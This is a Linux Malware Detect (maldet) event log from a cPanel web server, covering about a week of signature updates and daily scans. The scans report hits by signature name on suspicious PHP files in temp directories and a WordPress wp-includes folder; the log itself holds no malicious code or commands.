Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697bfd5f51918.php
Jan 30 2026 04:08:15 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697bcc2fd392a.php
Jan 30 2026 04:08:15 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c03f845ba3.php
Jan 30 2026 04:08:15 web1 maldet(257493): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 24451, malware hits 18, cleaned hits 0, time 247s
Jan 30 2026 04:08:15 web1 maldet(257493): {scan} scan report saved, to view run: maldet --report 260130-0404.257493
Jan 30 2026 04:08:15 web1 maldet(257493): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260130-0404.257493
Jan 30 2026 19:22:14 web1 maldet(1172): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 30 2026 22:59:20 web1 maldet(1161): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 31 2026 03:51:03 web1 maldet(87700): {update} checking for available updates...
Jan 31 2026 03:51:03 web1 maldet(87700): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 31 2026 03:51:03 web1 maldet(87700): {update} hashing install files and checking against server...
Jan 31 2026 03:51:04 web1 maldet(87700): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 31 2026 03:51:04 web1 maldet(87700): {update} latest version already installed.
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} performing signature update check...
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} local signature set is version 20260128388144
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} new signature set 202601311395689 available
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 31 2026 03:51:04 web1 maldet(87809): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} verified md5sum of maldet-clean.tgz
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} unpacked and installed maldet-clean.tgz
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} signature set update completed
Jan 31 2026 03:51:05 web1 maldet(87809): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 31 2026 03:51:05 web1 maldet(88021): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 31 2026 03:51:05 web1 maldet(88021): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 31 2026 03:51:05 web1 maldet(88021): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 31 2026 03:51:05 web1 maldet(88021): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 31 2026 03:51:05 web1 maldet(88021): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 31 2026 03:51:41 web1 maldet(88021): {scan} file list completed in 36s, found 29227 files...
Jan 31 2026 03:51:41 web1 maldet(88021): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 31 2026 03:51:41 web1 maldet(88021): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (29227 files) in progress...
Jan 31 2026 03:53:23 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc4bdd5f03.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc60ae98a4.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c94bba2897.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc5a2ddec5.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c912f02eed.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c91c8d90a9.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc4420b069.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc4bdd5f03.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc60ae98a4.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c94bba2897.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc5a2ddec5.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c912f02eed.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c91c8d90a9.php
Jan 31 2026 03:53:24 web1 maldet(88021): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697cc4420b069.php
Jan 31 2026 03:53:24 web1 maldet(88021): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 29227, malware hits 14, cleaned hits 0, time 139s
Jan 31 2026 03:53:24 web1 maldet(88021): {scan} scan report saved, to view run: maldet --report 260131-0351.88021
Jan 31 2026 03:53:24 web1 maldet(88021): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260131-0351.88021
Feb 01 2026 04:01:26 web1 maldet(513146): {update} checking for available updates...
Feb 01 2026 04:01:26 web1 maldet(513146): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 01 2026 04:01:26 web1 maldet(513146): {update} hashing install files and checking against server...
Feb 01 2026 04:01:27 web1 maldet(513146): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 01 2026 04:01:27 web1 maldet(513146): {update} latest version already installed.
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} performing signature update check...
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} local signature set is version 202601311395689
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} new signature set 202602012137134 available
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} verified md5sum of maldet-clean.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} unpacked and installed maldet-clean.tgz
Feb 01 2026 04:01:27 web1 maldet(513255): {sigup} signature set update completed
Feb 01 2026 04:01:28 web1 maldet(513255): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 01 2026 04:01:28 web1 maldet(513465): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 01 2026 04:01:28 web1 maldet(513465): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 01 2026 04:01:28 web1 maldet(513465): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 01 2026 04:01:28 web1 maldet(513465): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 01 2026 04:01:28 web1 maldet(513465): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 01 2026 04:02:04 web1 maldet(513465): {scan} file list completed in 36s, found 2549 files...
Feb 01 2026 04:02:04 web1 maldet(513465): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 01 2026 04:02:04 web1 maldet(513465): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (2549 files) in progress...
Feb 01 2026 04:03:15 web1 maldet(513465): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 2549, malware hits 0, cleaned hits 0, time 107s
Feb 01 2026 04:03:15 web1 maldet(513465): {scan} scan report saved, to view run: maldet --report 260201-0401.513465
Feb 01 2026 09:56:02 web1 maldet(1161): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 02 2026 04:39:28 web1 maldet(311876): {update} checking for available updates...
Feb 02 2026 04:39:28 web1 maldet(311876): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 02 2026 04:39:28 web1 maldet(311876): {update} hashing install files and checking against server...
Feb 02 2026 04:39:28 web1 maldet(311876): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 02 2026 04:39:28 web1 maldet(311876): {update} latest version already installed.
Feb 02 2026 04:39:28 web1 maldet(311985): {sigup} performing signature update check...
Feb 02 2026 04:39:28 web1 maldet(311985): {sigup} local signature set is version 202602012137134
Feb 02 2026 04:39:28 web1 maldet(311985): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 02 2026 04:39:28 web1 maldet(311985): {sigup} latest signature set already installed
Feb 02 2026 04:39:28 web1 maldet(312075): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 02 2026 04:39:29 web1 maldet(312075): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 02 2026 04:39:29 web1 maldet(312075): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 02 2026 04:39:29 web1 maldet(312075): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 02 2026 04:39:29 web1 maldet(312075): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 02 2026 04:40:05 web1 maldet(312075): {scan} file list completed in 36s, found 7101 files...
Feb 02 2026 04:40:05 web1 maldet(312075): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 02 2026 04:40:05 web1 maldet(312075): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (7101 files) in progress...
Feb 02 2026 04:40:53 web1 maldet(312075): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 7101, malware hits 0, cleaned hits 0, time 85s
Feb 02 2026 04:40:53 web1 maldet(312075): {scan} scan report saved, to view run: maldet --report 260202-0439.312075
Feb 02 2026 08:27:13 web1 maldet(1156): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 02 2026 15:58:54 web1 maldet(1170): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 03 2026 03:53:01 web1 maldet(238819): {update} checking for available updates...
Feb 03 2026 03:53:01 web1 maldet(238819): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 03 2026 03:53:01 web1 maldet(238819): {update} hashing install files and checking against server...
Feb 03 2026 03:53:01 web1 maldet(238819): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 03 2026 03:53:01 web1 maldet(238819): {update} latest version already installed.
Feb 03 2026 03:53:01 web1 maldet(238930): {sigup} performing signature update check...
Feb 03 2026 03:53:01 web1 maldet(238930): {sigup} local signature set is version 202602012137134
Feb 03 2026 03:53:02 web1 maldet(238930): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 03 2026 03:53:02 web1 maldet(238930): {sigup} latest signature set already installed
Feb 03 2026 03:53:02 web1 maldet(239018): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 03 2026 03:53:02 web1 maldet(239018): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 03 2026 03:53:02 web1 maldet(239018): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 03 2026 03:53:02 web1 maldet(239018): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 03 2026 03:53:02 web1 maldet(239018): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 03 2026 03:53:38 web1 maldet(239018): {scan} file list completed in 36s, found 15164 files...
Feb 03 2026 03:53:38 web1 maldet(239018): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 03 2026 03:53:38 web1 maldet(239018): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (15164 files) in progress...
Feb 03 2026 03:56:13 web1 maldet(239018): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 15164, malware hits 0, cleaned hits 0, time 191s
Feb 03 2026 03:56:13 web1 maldet(239018): {scan} scan report saved, to view run: maldet --report 260203-0353.239018
Feb 03 2026 06:24:43 web1 maldet(1167): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 04 2026 04:52:48 web1 maldet(431824): {update} checking for available updates...
Feb 04 2026 04:52:48 web1 maldet(431824): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 04 2026 04:52:48 web1 maldet(431824): {update} hashing install files and checking against server...
Feb 04 2026 04:52:48 web1 maldet(431824): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 04 2026 04:52:48 web1 maldet(431824): {update} latest version already installed.
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} performing signature update check...
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} local signature set is version 202602012137134
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} new signature set 202602043110684 available
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 04 2026 04:52:48 web1 maldet(431933): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} verified md5sum of maldet-clean.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} unpacked and installed maldet-clean.tgz
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} signature set update completed
Feb 04 2026 04:52:49 web1 maldet(431933): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 04 2026 04:52:49 web1 maldet(432135): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 04 2026 04:52:49 web1 maldet(432135): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 04 2026 04:52:49 web1 maldet(432135): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 04 2026 04:52:49 web1 maldet(432135): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 04 2026 04:52:49 web1 maldet(432135): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 04 2026 04:53:27 web1 maldet(432135): {scan} file list completed in 38s, found 40539 files...
Feb 04 2026 04:53:27 web1 maldet(432135): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 04 2026 04:53:27 web1 maldet(432135): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (40539 files) in progress...
Feb 04 2026 05:00:21 web1 maldet(432135): {hit} malware hit {HEX}php.exe.globals.416 found for /home/sps/public_html/wp-includes/mchwtg.php
Feb 04 2026 05:00:21 web1 maldet(432135): {hit} malware hit {HEX}php.exe.globals.416 found for /home/sps/public_html/wp-includes/wkwydt.php
Feb 04 2026 05:00:21 web1 maldet(432135): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 40539, malware hits 2, cleaned hits 0, time 452s
Feb 04 2026 05:00:21 web1 maldet(432135): {scan} scan report saved, to view run: maldet --report 260204-0452.432135
Feb 04 2026 05:00:21 web1 maldet(432135): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260204-0452.432135
Feb 04 2026 15:15:53 web1 maldet(1193): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 05 2026 04:10:26 web1 maldet(240425): {update} checking for available updates...
Feb 05 2026 04:10:26 web1 maldet(240425): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 05 2026 04:10:26 web1 maldet(240425): {update} hashing install files and checking against server...
Feb 05 2026 04:10:26 web1 maldet(240425): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 05 2026 04:10:26 web1 maldet(240425): {update} latest version already installed.
Feb 05 2026 04:10:26 web1 maldet(240534): {sigup} performing signature update check...
Feb 05 2026 04:10:26 web1 maldet(240534): {sigup} local signature set is version 202602043110684
Feb 05 2026 04:10:26 web1 maldet(240534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 05 2026 04:10:26 web1 maldet(240534): {sigup} latest signature set already installed
Feb 05 2026 04:10:26 web1 maldet(240622): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 05 2026 04:10:27 web1 maldet(240622): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 05 2026 04:10:27 web1 maldet(240622): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 05 2026 04:10:27 web1 maldet(240622): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 05 2026 04:10:27 web1 maldet(240622): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 05 2026 04:11:07 web1 maldet(240622): {scan} file list completed in 39s, found 49289 files...
Feb 05 2026 04:11:07 web1 maldet(240622): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 05 2026 04:11:07 web1 maldet(240622): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (49289 files) in progress...
Feb 05 2026 04:16:18 web1 maldet(240622): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 49289, malware hits 0, cleaned hits 0, time 352s
Feb 05 2026 04:16:18 web1 maldet(240622): {scan} scan report saved, to view run: maldet --report 260205-0410.240622
Feb 06 2026 04:29:09 web1 maldet(679893): {update} checking for available updates...
Feb 06 2026 04:29:09 web1 maldet(679893): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 06 2026 04:29:09 web1 maldet(679893): {update} hashing install files and checking against server...
Feb 06 2026 04:29:09 web1 maldet(679893): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 06 2026 04:29:09 web1 maldet(679893): {update} latest version already installed.
Feb 06 2026 04:29:09 web1 maldet(680002): {sigup} performing signature update check...
Feb 06 2026 04:29:09 web1 maldet(680002): {sigup} local signature set is version 202602043110684
Feb 06 2026 04:29:09 web1 maldet(680002): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 06 2026 04:29:09 web1 maldet(680002): {sigup} latest signature set already installed
Feb 06 2026 04:29:09 web1 maldet(680090): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 06 2026 04:29:09 web1 maldet(680090): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 06 2026 04:29:09 web1 maldet(680090): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 06 2026 04:29:09 web1 maldet(680090): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 06 2026 04:29:09 web1 maldet(680090): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 06 2026 04:29:42 web1 maldet(680090): {scan} file list completed in 33s, found 28423 files...
Feb 06 2026 04:29:42 web1 maldet(680090): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 06 2026 04:29:42 web1 maldet(680090): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (28423 files) in progress...
Feb 06 2026 04:33:13 web1 maldet(680090): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 28423, malware hits 0, cleaned hits 0, time 244s
Feb 06 2026 04:33:13 web1 maldet(680090): {scan} scan report saved, to view run: maldet --report 260206-0429.680090
Feb 06 2026 08:35:57 web1 maldet(1185): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 07 2026 03:37:15 web1 maldet(366328): {update} checking for available updates...
Feb 07 2026 03:37:16 web1 maldet(366328): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 07 2026 03:37:16 web1 maldet(366328): {update} hashing install files and checking against server...
Feb 07 2026 03:37:16 web1 maldet(366328): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 07 2026 03:37:16 web1 maldet(366328): {update} latest version already installed.
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} performing signature update check...
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} local signature set is version 202602043110684
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} new signature set 202602074095392 available
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
